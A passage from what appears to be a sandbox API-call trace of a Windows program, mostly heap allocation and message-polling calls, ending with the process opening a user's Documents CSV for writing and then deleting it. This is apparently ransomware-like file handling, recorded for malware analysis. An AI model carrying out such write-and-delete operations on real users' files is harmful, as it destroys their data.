hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0180.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0180.387] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0180.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0180.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0180.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0180.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0180.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0180.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0180.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0180.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0180.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0180.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0180.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0180.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0180.387] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0180.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0180.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0180.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0180.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0180.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0180.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0180.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0180.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0180.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0180.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0180.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0180.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0180.388] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0180.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0180.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0180.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0180.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0180.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0180.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0180.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0180.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0180.389] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0180.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0180.389] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.389] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0180.389] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0180.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0180.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0180.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0180.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0180.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0180.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0180.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0180.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0180.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0180.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0180.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0180.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0180.390] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0180.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0180.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0180.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0180.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0180.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0180.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0180.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0180.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0180.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0180.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0180.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0180.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0180.390] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0180.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0180.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0180.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0180.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0180.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0180.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0180.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0180.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0180.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0180.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0180.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0180.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0180.391] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0180.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0180.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0180.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0180.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0180.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0180.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0180.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0180.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0180.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0180.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0180.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0180.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0180.392] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0180.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0180.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0180.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0180.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0180.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0180.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0180.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0180.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0180.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0180.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.393] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0180.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0180.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0180.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0180.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0180.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0180.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0180.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0180.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0180.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0180.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0180.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0180.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0180.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0180.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0180.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0180.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0180.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0180.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0180.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0180.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0180.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0180.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0180.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0180.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0180.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0180.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0180.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0180.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0180.395] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.396] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zw2wea8 QxA.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zw2wea8 qxa.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0180.397] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.397] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.397] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.397] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.397] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0180.397] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.397] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.397] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.399] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.399] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.399] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.399] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.399] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.399] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0180.399] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.399] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.399] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.400] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.400] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.400] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.400] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.400] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zw2wea8 QxA.csv", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zw2wea8 QxA.csv", lpFilePart=0x0) returned 0x37 [0180.401] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zw2wea8 QxA.csv", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa07c2050, ftCreationTime.dwHighDateTime=0x1d5e47a, ftLastAccessTime.dwLowDateTime=0x19f5cf50, ftLastAccessTime.dwHighDateTime=0x1d5e2b7, ftLastWriteTime.dwLowDateTime=0x10cc5760, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x5acd, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="zw2wea8 QxA.csv", cAlternateFileName="ZW2WEA~1.CSV")) returned 0x90ae18 [0180.401] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zw2wea8 QxA.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zw2wea8 qxa.csv")) returned 1 [0180.403] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa07c2050, ftCreationTime.dwHighDateTime=0x1d5e47a, ftLastAccessTime.dwLowDateTime=0x19f5cf50, ftLastAccessTime.dwHighDateTime=0x1d5e2b7, ftLastWriteTime.dwLowDateTime=0x10cc5760, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x5acd, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="zw2wea8 QxA.csv", cAlternateFileName="ZW2WEA~1.CSV")) returned 0 [0180.404] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0180.404] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.405] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.405] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 